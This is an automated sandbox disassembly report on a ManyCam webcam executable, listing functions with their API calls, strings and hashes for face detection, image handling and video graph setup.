Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeapswscanf$Base::Concurrency::details::ContextIdentityQueueWork
String ID: Error parsing color field: one of color components is not specified$Error parsing color field: one of color components is not specified$Error parsing color field: one of color components is not specified$Error parsing color field: unexpected symbols '%s'.$Error parsing color field: wrong number of symbols after '#'$Success.$Unspecified error.$rgb(
API String ID: 1122337173-231897244
Opcode ID: 683619098a5f14be788e1fbab1df8c809ac1bea4690c2859a926c6c666e65a2e
Instruction ID: 514317ef524717ef2c7c16df4d54ca1b957cd51d0b51933f763c983e9b3e5875
Opcode Fuzzy Hash: 683619098a5f14be788e1fbab1df8c809ac1bea4690c2859a926c6c666e65a2e
Instruction Fuzzy Hash: 64D16F71901208EEDB04EBA5DC56BEEBB74AF10304F50816EF41AA72D1DB786B48CB95

Function 00401E00 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 165COMMON

Download Yara Rule

APIs

cvCreateImage.CXCORE099(?,?,00000008,00000001), ref: 00401E39
cvCreateImage.CXCORE099(?,?,00000008,00000001), ref: 00401E7D
cvCvtColor.CV099(?,?,00000006,?,?,00000008,00000001), ref: 00401E8E
cvResize.CV099(?,?,00000001), ref: 00401EA2
cvEqualizeHist.CV099(?,?), ref: 00401EB0
cvClearMemStorage.CXCORE099(?,?,?), ref: 00401EB6
cvHaarDetectObjects.CV099(?,?,?,0000001E,0000001E), ref: 00401EDE
cvReleaseImage.CXCORE099(?), ref: 00401EED
cvReleaseImage.CXCORE099(?), ref: 00401EFA
cvGetSeqElem.CXCORE099(00000000,00000000), ref: 00401F0F
cvClearSeq.CXCORE099(00000000), ref: 00401FC9
cvError.CXCORE099(000000FE,auxDetectFace,Invalid input data,.\src\cylaux.cpp,0000002C), ref: 00401FF0

Strings

Invalid input data, xrefs: 00401FE4
.\src\cylaux.cpp, xrefs: 00401FDF
auxDetectFace, xrefs: 00401FE9

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Image$ClearCreateRelease$ColorDetectElemEqualizeErrorHaarHistObjectsResizeStorage
String ID: .\src\cylaux.cpp$Invalid input data$auxDetectFace
API String ID: 2437743724-1894629017
Opcode ID: 2bb4529f379278a41ca53a7c36763ca3dde82cfa4019168cc177150fd70c6ded
Instruction ID: ac98781828b75c9019f3c1cd100c5520617b492f8a1ed74b89b13fa435fe6163
Opcode Fuzzy Hash: 2bb4529f379278a41ca53a7c36763ca3dde82cfa4019168cc177150fd70c6ded
Instruction Fuzzy Hash: 0951B170608710ABD300AF14E84AA2BBBE4FFC8714F054E58F489672A5DA31D974CB56

Function 00506610 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 118fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0050665D
GetFileSize.KERNEL32(000000FF,00000000), ref: 0050669D
CloseHandle.KERNEL32(000000FF), ref: 005066AE

Part of subcall function 00416740: _DebugHeapAllocator.LIBCPMTD ref: 00416795

Strings

You have selected a file with the size larger than 3Mb., xrefs: 005066B4
The Resource File is corrupted. Please select another., xrefs: 00506718
The Resource File is corrupted. Please select another., xrefs: 0050666C
You have selected an image with the dimension larger than 3000x2000., xrefs: 0050676F

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: File$AllocatorCloseCreateDebugHandleHeapSize
String ID: The Resource File is corrupted. Please select another.$The Resource File is corrupted. Please select another.$You have selected a file with the size larger than 3Mb.$You have selected an image with the dimension larger than 3000x2000.
API String ID: 1278540365-1045440647
Opcode ID: a2995053e53532cd3cc61e84a4e3e243a16d3489957e33b38d496d8e3a878c98
Instruction ID: bf2e516d7632956263a6d0b7edc6ab055445a249ca0629827ad9313cad8a857e
Opcode Fuzzy Hash: a2995053e53532cd3cc61e84a4e3e243a16d3489957e33b38d496d8e3a878c98
Instruction Fuzzy Hash: 3D513C70900259ABDB25EF14DC55BEDBBB0FF45704F1085AAF819AB2D0CB75AE84CB80

Function 00513E80 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 118fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00513ECD
GetFileSize.KERNEL32(000000FF,00000000), ref: 00513F0D
CloseHandle.KERNEL32(000000FF), ref: 00513F1E

Part of subcall function 00416740: _DebugHeapAllocator.LIBCPMTD ref: 00416795

Strings

You have selected a file with the size larger than 3Mb., xrefs: 00513F24
The Resource File is corrupted. Please select another., xrefs: 00513F88
The Resource File is corrupted. Please select another., xrefs: 00513EDC
You have selected an image with the dimension larger than 3000x2000., xrefs: 00513FDF

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: File$AllocatorCloseCreateDebugHandleHeapSize
String ID: The Resource File is corrupted. Please select another.$The Resource File is corrupted. Please select another.$You have selected a file with the size larger than 3Mb.$You have selected an image with the dimension larger than 3000x2000.
API String ID: 1278540365-1045440647
Opcode ID: 31dae65b8d5032fe5dc687f767acb6db0229cd793d994c6b1de10459a5ee8fd9
Instruction ID: 23f2238794eb66d98ba3da9ec40f43027c5041e0f5ff9c1f0f1834951436c019
Opcode Fuzzy Hash: 31dae65b8d5032fe5dc687f767acb6db0229cd793d994c6b1de10459a5ee8fd9
Instruction Fuzzy Hash: 27511970900259AFEB15EF14DC55BEDBB70BB45344F10859AE815AB2D0CB74AF84DF80

Function 004E5580 Relevance: 24.9, APIs: 11, Strings: 3, Instructions: 371memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00438A10: clock.MSVCR80 ref: 00438AA7
Part of subcall function 00438A10: _DebugHeapAllocator.LIBCPMTD ref: 00438AC5

??2@YAPAXI@Z.MSVCR80(000001F8,00000000,?,?,?,?,?,?,?,?,?,744843B1), ref: 004E56C0
_DebugHeapAllocator.LIBCPMTD ref: 004E56E8

Part of subcall function 004D7750: _DebugHeapAllocator.LIBCPMTD ref: 004D7791

Part of subcall function 00418CB0: EnterCriticalSection.KERNEL32(xJ,00000001,?,004A78E3,?,004A7688,00000001,744843B1,?,?,00000000,005372A8,000000FF,?,004602DC), ref: 00418CBB

Concurrency::cancellation_token_source::~cancellation_token_source.LIBCPMTD ref: 004E5761
Concurrency::cancellation_token_source::~cancellation_token_source.LIBCPMTD ref: 004E57BA
_DebugHeapAllocator.LIBCPMTD ref: 004E57A0

Part of subcall function 00418D00: LeaveCriticalSection.KERNEL32(00000001,00000000,?,00418CE9,00000001,?,00418C7A,00417F19,?,00522EAF,?,005A2ECC,005A2ECC,?,00417F19), ref: 00418D0B

Strings

Changing source to type=%d, name=%s, xrefs: 004E5615
SetVideoSource completed with bStatus = %d., xrefs: 004E5A61
CVideoLayer::SetVideoSource (%s), xrefs: 004E55B2

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeap$Concurrency::cancellation_token_source::~cancellation_token_sourceCriticalSection$??2@EnterLeaveclock
String ID: CVideoLayer::SetVideoSource (%s)$Changing source to type=%d, name=%s$SetVideoSource completed with bStatus = %d.
API String ID: 940658134-2688229957
Opcode ID: ed1a128956794bde5e5230a4d138cfadb2c5c7bc89fd5ac7b4d3999619687d38
Instruction ID: dba240629de62da63940887bf9cd1e5b9116a74bbdd400ead28e10356bf54a65
Opcode Fuzzy Hash: ed1a128956794bde5e5230a4d138cfadb2c5c7bc89fd5ac7b4d3999619687d38
Instruction Fuzzy Hash: 0EF12B70E00248DFDB04DF95C8A1BEEB7B5AF48308F24816EE4196B392DB796D41CB95

Function 0040C220 Relevance: 24.8, APIs: 9, Strings: 5, Instructions: 308memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FA80: List.LIBCMTD ref: 0040FA8A

_DebugHeapAllocator.LIBCPMTD ref: 0040C2DC

Part of subcall function 004DBD20: Concurrency::details::SchedulerBase::GetPolicy.LIBCMTD ref: 004DBD89

Concurrency::details::SchedulerBase::GetPolicy.LIBCMTD ref: 0040C305

Part of subcall function 004DB530: _DebugHeapAllocator.LIBCPMTD ref: 004DB54A

_DebugHeapAllocator.LIBCPMTD ref: 0040C35E
_DebugHeapAllocator.LIBCPMTD ref: 0040C371

Part of subcall function 004DAFB0: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 004DB014

_snwprintf.MSVCR80 ref: 0040C591
wcslen.MSVCR80 ref: 0040C59E
wcscpy.MSVCR80 ref: 0040C5CE
wcslen.MSVCR80 ref: 0040C5DB

Part of subcall function 0040F760: _invalid_parameter_noinfo.MSVCR80(00000000,?,00409D5D,?,?,00000000,?,?,?,mce,?,?,?,?,?,?), ref: 0040F774

wcscat.MSVCR80 ref: 0040C633

Strings

*.%s, xrefs: 0040C426
;*.%s, xrefs: 0040C488
%s files (%s), xrefs: 0040C583
;*.%s, xrefs: 0040C568
*.%s, xrefs: 0040C506

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeap$Base::Concurrency::details::$PolicySchedulerwcslen$ContextIdentityListQueueWork_invalid_parameter_noinfo_snwprintfwcscatwcscpy
String ID: %s files (%s)$*.%s$*.%s$;*.%s$;*.%s
API String ID: 3673500439-2222090975
Opcode ID: 410b57a6a7f9a888242e909b12c55668fef034fc55ece74735e624549ad644eb
Instruction ID: 0f1205feb10db953e557daecc0f66cfc6334ceda2ae244769a0a321528e6ad92
Opcode Fuzzy Hash: 410b57a6a7f9a888242e909b12c55668fef034fc55ece74735e624549ad644eb
Instruction Fuzzy Hash: 7BC12F71D00208DBDB14EBA5E892BEEB775AF54308F10417EF116B72D1DB385A48CB99

Function 0041A3B0 Relevance: 24.8, APIs: 6, Strings: 8, Instructions: 308memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004CB670: _DebugHeapAllocator.LIBCPMTD ref: 004CB6AA
Part of subcall function 004CB670: _DebugHeapAllocator.LIBCPMTD ref: 004CB711
Part of subcall function 004CB670: _DebugHeapAllocator.LIBCPMTD ref: 004CB76F
Part of subcall function 004CB670: _DebugHeapAllocator.LIBCPMTD ref: 004CB787

_DebugHeapAllocator.LIBCPMTD ref: 0041A415

Part of subcall function 0040EA00: _DebugHeapAllocator.LIBCPMTD ref: 0040EA0E

Part of subcall function 0040EE30: _DebugHeapAllocator.LIBCPMTD ref: 0040EE68
Part of subcall function 0040EE30: _DebugHeapAllocator.LIBCPMTD ref: 0040EEAA

_DebugHeapAllocator.LIBCPMTD ref: 0041A437
_DebugHeapAllocator.LIBCPMTD ref: 0041A455
_DebugHeapAllocator.LIBCPMTD ref: 0041A47D

Part of subcall function 00472C60: _wfopen_s.MSVCR80 ref: 00472CBE
Part of subcall function 00472C60: fclose.MSVCR80 ref: 00472CDF

Part of subcall function 00416740: _DebugHeapAllocator.LIBCPMTD ref: 00416795

Part of subcall function 004730D0: _DebugHeapAllocator.LIBCPMTD ref: 0047314B
Part of subcall function 004730D0: _DebugHeapAllocator.LIBCPMTD ref: 0047316D

?Load@CxImage@@QAE_NPB_WK@Z.CXIMAGECRT(00000000,00000000,?,00000000,?,0053E990,?,?,?,?,?,\class.xml,?,?,?,data\images\), ref: 0041A530

Strings

icon_and_text, xrefs: 0041A696
8S, xrefs: 0041A6B6
\class.xml, xrefs: 0041A42F
data\images\, xrefs: 0041A40D
P, xrefs: 0041A4A6
S, xrefs: 0041A6C4
style, xrefs: 0041A64A
icon, xrefs: 0041A674

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeap$Image@@Load@_wfopen_sfclose
String ID: 8S$P$\class.xml$data\images\$icon$icon_and_text$style$S
API String ID: 255584289-693003568
Opcode ID: 603b225bfe0989b9d3390ef585aae42c8b49bc1da2bbc25a9b3d303a95ec7668
Instruction ID: 810976337b1479ad00da3f975604671f65968c870661c51cbc195e462080606e
Opcode Fuzzy Hash: 603b225bfe0989b9d3390ef585aae42c8b49bc1da2bbc25a9b3d303a95ec7668
Instruction Fuzzy Hash: 4BD16EB0D012189BDB14DB95CD92BEDBBB4BF18304F10819EE14A77281DB746E85CF9A

Function 00401690 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 176COMMON

Download Yara Rule

APIs

cvCvtColor.CV099(?,?,00000007), ref: 004016FA
cvGetImageROI.CXCORE099(?,?), ref: 0040170E
cvSobel.CV099(?,?,00000001,00000000,00000003,?,?), ref: 00401742
cvSobel.CV099(?,?,00000000,00000001,00000003), ref: 00401758
cvGEMM.CXCORE099(?,?,?,00000000,?,00000000), ref: 004017D9
cvCopy.CXCORE099(?,?,00000000), ref: 004017F1
cvError.CXCORE099(000000FB,cvCylTrackModel,Invalid input frame.,.\src\cyltracker.cpp,000001A0), ref: 00401886
cvSetImageROI.CXCORE099(?), ref: 004018B5

Strings

Null pointer to the tracker context., xrefs: 004016BD
.\src\cyltracker.cpp, xrefs: 004016B8, 00401875
Invalid input frame., xrefs: 0040187A
cvCylTrackModel, xrefs: 0040187F

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: ImageSobel$ColorCopyError
String ID: .\src\cyltracker.cpp$Invalid input frame.$Null pointer to the tracker context.$cvCylTrackModel
API String ID: 3140367126-428952811
Opcode ID: 3ec082688a0413c58711cd9b83bdb17f3b228cbd943129101cc4b4c10cf63d8e
Instruction ID: 66ebd014f4a14a4e4a4a45a8ae43f3bc62eaeaf842471fa18c085293a8b48d64
Opcode Fuzzy Hash: 3ec082688a0413c58711cd9b83bdb17f3b228cbd943129101cc4b4c10cf63d8e
Instruction Fuzzy Hash: 5051A1B1B00601ABC608EB64DC86FA6F7A5BF89710F008229FA58573D1D774E924CBD6

Function 004B8420 Relevance: 23.0, APIs: 4, Strings: 9, Instructions: 284memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00438A10: clock.MSVCR80 ref: 00438AA7
Part of subcall function 00438A10: _DebugHeapAllocator.LIBCPMTD ref: 00438AC5

_DebugHeapAllocator.LIBCPMTD ref: 004B84DB
??2@YAPAXI@Z.MSVCR80(00000030,?,?,?,?,?,?,?,744843B1), ref: 004B84E2

Part of subcall function 004B77A0: fwprintf.MSVCR80 ref: 004B7842
Part of subcall function 004B77A0: fflush.MSVCR80 ref: 004B7852

Part of subcall function 00438AF0: clock.MSVCR80 ref: 00438B1F

Strings

AppModel pointer is NULL! Returning E_FAIL., xrefs: 004B8472
CManyCamGraphMgr::CreateGraph, xrefs: 004B8448
Couldn't find the graph %s!, xrefs: 004B86E7
Creating frame grabbing graph for file %s, xrefs: 004B856B
Setting graph state %d, xrefs: 004B8655
Setting current pos for the graph %s, xrefs: 004B8616
Destroying the graph., xrefs: 004B8725
Creating frame grabbing graph for camera %s, xrefs: 004B84C0
Failed creating graph with hr=%X; preparing to clean up., xrefs: 004B8697

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeapclock$??2@fflushfwprintf
String ID: AppModel pointer is NULL! Returning E_FAIL.$CManyCamGraphMgr::CreateGraph$Couldn't find the graph %s!$Creating frame grabbing graph for camera %s$Creating frame grabbing graph for file %s$Destroying the graph.$Failed creating graph with hr=%X; preparing to clean up.$Setting current pos for the graph %s$Setting graph state %d
API String ID: 1778695617-1153812090
Opcode ID: f1e7f66eff02cda7a9ed3db3bcb49d45f39b49662cdf193da7ba6901c3f1654f
Instruction ID: f3cb85e83180b36cfd0b303413b5ba2857901d6173e86f69feec068597868732
Opcode Fuzzy Hash: f1e7f66eff02cda7a9ed3db3bcb49d45f39b49662cdf193da7ba6901c3f1654f
Instruction Fuzzy Hash: FBC11B75D00209AFDB04DF99CC92BEEB7B4AF48308F14411EF5167B292DB786A05CB69

Function 005062D0 Relevance: 23.0, APIs: 9, Strings: 4, Instructions: 206memoryCOMMON

Download Yara Rule

APIs

_DebugHeapAllocator.LIBCPMTD ref: 00506312
_DebugHeapAllocator.LIBCPMTD ref: 00506336
_DebugHeapAllocator.LIBCPMTD ref: 00506352
_DebugHeapAllocator.LIBCPMTD ref: 0050636E

Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB139
Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB155
Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB171
Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB1A3
Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB1D6

??0CxImage@@QAE@K@Z.CXIMAGECRT(00000000,000000FF,?,?,?,?,?,?,?,?,?,00000000,?,00000002,744843B1), ref: 005063A1
??0CxImage@@QAE@K@Z.CXIMAGECRT(00000000,00000000,000000FF,?,?,?,?,?,?,?,?,?,00000000,?,00000002,744843B1), ref: 005063B5

Part of subcall function 00416740: _DebugHeapAllocator.LIBCPMTD ref: 00416795

Part of subcall function 0050E4A0: _DebugHeapAllocator.LIBCPMTD ref: 0050E4E3
Part of subcall function 0050E4A0: _DebugHeapAllocator.LIBCPMTD ref: 0050E4FF

memcpy.MSVCR80(?,?,?,744843B1), ref: 0050646C
??3@YAXPAX@Z.MSVCR80(?,?,anonymous_type,?,?,mask_reader_ver,?,?,mask_type,?,?,?,?,744843B1), ref: 0050652C
??3@YAXPAX@Z.MSVCR80(?,?,?,?,?,744843B1), ref: 0050653E

Strings

properties, xrefs: 005063F3
anonymous_type, xrefs: 005064F1
mask_reader_ver, xrefs: 005064BA
mask_type, xrefs: 00506483

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeap$??3@Image@@$memcpy
String ID: anonymous_type$mask_reader_ver$mask_type$properties
API String ID: 3418783136-1683271502
Opcode ID: ea6c7d0e71fb220edab34224d6aa0e07e57cb9ccd2759369dc2a5b15c5864e21
Instruction ID: 830ff7d4bb77275050dcf287e18c53aa9cee5c96830a24d37f20f8f55580aab9
Opcode Fuzzy Hash: ea6c7d0e71fb220edab34224d6aa0e07e57cb9ccd2759369dc2a5b15c5864e21
Instruction Fuzzy Hash: 8891F7B1E002489FDB04DFA8D896BEEBBB5BF88304F10816DE419A7381DB345A45CF91

Function 00514480 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 157memoryCOMMON

Download Yara Rule

APIs

?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(744843B1,000000FF,?,005125AA,?,?,?,00000000,?,?,?,?,?,00569F04,preview.jpg,00000000), ref: 005144AB
?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT(744843B1,000000FF,?,005125AA,?,?,?,00000000,?,?,?,?,?,00569F04,preview.jpg,00000000), ref: 005144B6
?Resample@CxImage@@QAE_NJJHPAV1@@Z.CXIMAGECRT(00000160,00000000,00000001,00000000,?,?,?,00000160,00000120,00000001,744843B1,000000FF,?,005125AA,?,?), ref: 00514559
?IncreaseBpp@CxImage@@QAE_NK@Z.CXIMAGECRT(00000018,00000160,00000000,00000001,00000000,?,?,?,00000160,00000120,00000001,744843B1,000000FF,?,005125AA,?), ref: 00514563
?AlphaCreate@CxImage@@QAE_NXZ.CXIMAGECRT(00000018,00000160,00000000,00000001,00000000,?,?,?,00000160,00000120,00000001,744843B1,000000FF,?,005125AA,?), ref: 0051456B
?Save@CxImage@@QAE_NPB_WK@Z.CXIMAGECRT(00000000,00000004,00000160,00000120,00000001,744843B1,000000FF,?,005125AA,?,?,?,00000000,?,?,?), ref: 005145B1
_DebugHeapAllocator.LIBCPMTD ref: 005145DC
?Resample@CxImage@@QAE_NJJHPAV1@@Z.CXIMAGECRT(?,00569E8C,00000001,00000000,00000000,0056A220,00000000,00000004,00000160,00000120,00000001,744843B1,000000FF,?,005125AA,?), ref: 0051463E
?Save@CxImage@@QAE_NPB_WK@Z.CXIMAGECRT(00000000,00000004,?,00569E8C,00000001,00000000,00000000,0056A220,00000000,00000004,00000160,00000120,00000001,744843B1,000000FF), ref: 00514651

Strings

%s\%d.png, xrefs: 005145F6
640x480, xrefs: 005145F1
%s\%d.png, xrefs: 00514592
352x288, xrefs: 0051458D

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Image@@$Resample@Save@V1@@$AllocatorAlphaBpp@Create@DebugHeapHeight@IncreaseWidth@
String ID: %s\%d.png$%s\%d.png$352x288$640x480
API String ID: 2860891125-2440275166
Opcode ID: a43d91bb6eb54d53ff6a1737a5b0fe56c092a8fccabc49aed94ca0378de78455
Instruction ID: acc42daae56a842fc35e0990e2763de5810e809cf3d34599ed660b5ee8a323ea
Opcode Fuzzy Hash: a43d91bb6eb54d53ff6a1737a5b0fe56c092a8fccabc49aed94ca0378de78455
Instruction Fuzzy Hash: 5A6107B5E00209AFDB04EF99D892AEEBBB5FF88300F108529F515B7291DB746941CF94

Function 00C12800 Relevance: 21.3, APIs: 6, Strings: 6, Instructions: 296COMMON

Download Yara Rule

APIs

cvGetMat.GLU32(?,?,?,00000000), ref: 00C1290E
cvGetErrStatus.GLU32 ref: 00C12918
cvErrorFromIppStatus.GLU32(00000000,cvMean_StdDev,OpenCV function failed,.\cxmeansdv.cpp,000002DC), ref: 00C12A2D
cvError.GLU32(FFFFFF2F,cvMean_StdDev,00C4124F,.\cxmeansdv.cpp,000002F4), ref: 00C12BD4

Strings

OpenCV function failed, xrefs: 00C12A22
The input array must have at most 4 channels unless COI is set, xrefs: 00C12969
